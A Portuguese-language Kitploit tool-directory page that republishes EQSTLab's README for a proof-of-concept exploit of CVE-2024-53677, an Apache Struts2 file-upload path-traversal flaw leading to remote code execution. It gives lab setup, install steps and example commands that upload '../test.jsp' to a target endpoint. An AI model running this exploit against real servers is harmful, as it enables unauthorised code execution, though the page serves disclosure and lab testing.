Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-53677 — Falha de lógica no upload de arquivos no exploit do Apache Struts2 | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2024-53677
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubeqstlab/cve-2024-53677

CVE-2024-53677

Falha de lógica no upload de arquivos no exploit do Apache Struts2

Ver Repositório
172há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Este post é um artigo de pesquisa publicado por EQSTLab.

CVE-2024-53677

★ CVE-2024-53677 Upload Irrestrito de Arquivo com Tipo Perigoso e PoC de RCE ★

Configuração do Laboratório

root@kitploit:~
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677

Linha do tempo

11 de dez : PoC de upload de arquivo CVE-2024-53677 publicado

Descrição

CVE-2024-53677 : A lógica de upload de arquivo no Apache Struts contém uma falha. Um atacante pode manipular os parâmetros de upload de arquivo para permitir path traversal e, em algumas circunstâncias, isso pode levar ao upload de um arquivo malicioso que pode ser usado para realizar execução remota de código. Este problema afeta o Apache Struts: da versão 2.0.0 até antes da 6.4.0. Recomenda-se que os usuários atualizem para a versão 6.4.0 no mínimo e migrem para o novo mecanismo de upload de arquivo https://struts.apache.org/core-developers/file-upload . Se você não está usando uma lógica antiga de upload de arquivo baseada no FileuploadInterceptor, sua aplicação está segura. Você pode encontrar mais detalhes em https://cwiki.apache.org/confluence/display/WW/S2-067.

Como usar

Clonar repositório

root@kitploit:~
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677

Instalar pacotes

root@kitploit:~
pip install -r requirements.txt

Comando

root@kitploit:~
# Upload the default file
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Upload Specified File
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <File Path>

Exemplo

root@kitploit:~
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt

Saída

CVE-2024-53677.py

Resultado

Isenção de responsabilidade

Este repositório não pretende ser um exploit de injeção de objetos para o CVE-2024-53677. O objetivo deste projeto é ajudar as pessoas a aprender sobre essa vulnerabilidade e, talvez, testar suas próprias aplicações.

EQST Insight

Publicamos análises de CVE e malware uma vez por mês. Se você tiver interesse, siga os links abaixo para conferir nossas publicações. https://www.skshieldus.com/eng/business/insight.do

Referência

https://nvd.nist.gov/vuln/detail/CVE-2024-53677

https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/

https://attackerkb.com/topics/YfjepZ70DS/cve-2024-53677

https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker

Baixar ferramenta